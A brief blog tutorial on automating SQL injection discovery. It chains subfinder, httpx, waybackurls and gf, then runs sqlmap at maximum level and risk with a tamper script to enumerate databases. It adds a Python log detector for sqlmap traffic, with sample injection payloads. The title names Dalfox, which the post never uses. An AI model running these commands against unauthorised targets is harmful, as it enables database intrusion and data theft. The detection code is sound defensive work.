Automating SQL Injection using Dalfox, GF and Waybackurls

Jun 21, 2025

SQL injection attacks are attacks on web applications in which malicious code is inserted into input that the application accepts and is then executed by the server.

Impact of SQL Injection attacks

  1. Financial losses from handling security incidents.
  2. Damage to the company’s reputation.
  3. Loss of consumer trust.
  4. Data leaks, such as personal data or sensitive company data.
  5. Possible takeover of user accounts by the attacker.

There are several methods you can use; in this post I will explain one that uses the Dalfox, GF and Waybackurls tools.

subfinder -d example.com | tee -a domains.txt
cat domains.txt | httpx | tee urls.alive
cat urls.alive | waybackurls | tee wayback.urls

Then filter wayback.urls for URLs that may be susceptible to SQL injection.

gf sqli wayback.urls >> urls.sqli

In the next step, we use sqlmap to search for SQL injection bugs.

sqlmap -m urls.sqli --level 5 --risk 3 --batch --dbs --tamper=between

Hmm looks like it’s done
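
On the defending side, a run like the one above leaves recognisable traces in web access logs: sqlmap's default User-Agent and, with --tamper=between, comparisons rewritten as BETWEEN tests. The following Python detector is an added example, not part of the original post; the log lines, IP addresses, version string and rule names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

LINE_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Boolean test rewritten to BETWEEN, the shape --tamper=between produces.
BETWEEN_RE = re.compile(r'\b(?:AND|OR)\b.{0,120}?\bBETWEEN\s+\d+\s+AND\s+\d+', re.I)
KEYWORD_RE = re.compile(
    r'\bUNION\s+(?:ALL\s+)?SELECT\b|\bSLEEP\s*\(|\(\s*SELECT\b|\bINFORMATION_SCHEMA\b', re.I)

def classify(target, user_agent):
    """Return the names of the rules a single request matches."""
    query = unquote_plus(urlsplit(target).query)  # decode %20 and + before matching
    hits = []
    if user_agent.lower().startswith("sqlmap/"):
        hits.append("sqlmap-user-agent")
    if BETWEEN_RE.search(query):
        hits.append("between-boolean-test")
    if KEYWORD_RE.search(query):
        hits.append("sql-keyword-in-param")
    return hits

def scan(lines):
    """Map each source IP to the set of rules its requests triggered."""
    findings = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        hits = classify(m["target"], m["ua"])
        if hits:
            findings[m["ip"]].update(hits)
    return dict(findings)

# Constructed sample lines in combined log format (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Jun/2025:10:00:01 +0000] "GET /item.php?id=5 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [21/Jun/2025:10:00:02 +0000] "GET /item.php?id=5%20AND%204821%20BETWEEN%204821%20AND%204821 HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"',
    '203.0.113.12 - - [21/Jun/2025:10:00:03 +0000] "GET /item.php?id=5%20AND%20(SELECT%2077)%20NOT%20BETWEEN%200%20AND%2064 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [21/Jun/2025:10:00:04 +0000] "GET /search?q=price+between+10+and+20 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, rules in scan(SAMPLE_LOG).items():
        print(ip, sorted(rules))
```

The User-Agent rule only catches runs that keep sqlmap's default header, so the query-string rules are the ones that still fire when the header is changed; the benign "price between 10 and 20" search shows why the BETWEEN rule requires a preceding AND/OR.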


Written by イズミー

a tech enthusiast passionate about system administration, DevOps, and cybersecurity. Always learning, always securing
